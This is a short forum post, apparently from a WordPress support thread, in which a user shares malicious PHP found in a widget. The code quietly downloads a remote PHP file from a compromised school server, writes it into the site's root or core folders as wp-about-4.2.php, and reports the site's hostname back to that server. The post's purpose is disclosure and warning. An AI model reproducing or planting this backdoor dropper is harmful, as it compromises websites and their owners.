Thanks @useshots. That was what was happening with me also. I saw the script was referencing a file hosted on some private school in Louisiana’s server. I emailed them to let them know.
This is the php:
function BNS_Add_Widget_Definition() {
if (!file_exists(ABSPATH.'wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-content/wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-includes/wp-about-4.2.php')){
$bns_conf=wp_remote_get('https://archbishopchapelle.org/wp-content/uploads/wpmp-previews/temp.php');
if (!file_put_contents(ABSPATH.'wp-about-4.2.php',$bns_conf["body"])){
if (!file_put_contents(ABSPATH.'wp-content/wp-about-4.2.php',$bns_conf["body"])){
file_put_contents(ABSPATH.'wp-includes/wp-about-4.2.php',$bns_conf["body"]);
$bns_conf=wp_remote_get('https://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-2'));
} else $bns_conf=wp_remote_get('https://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-1'));
}
}
}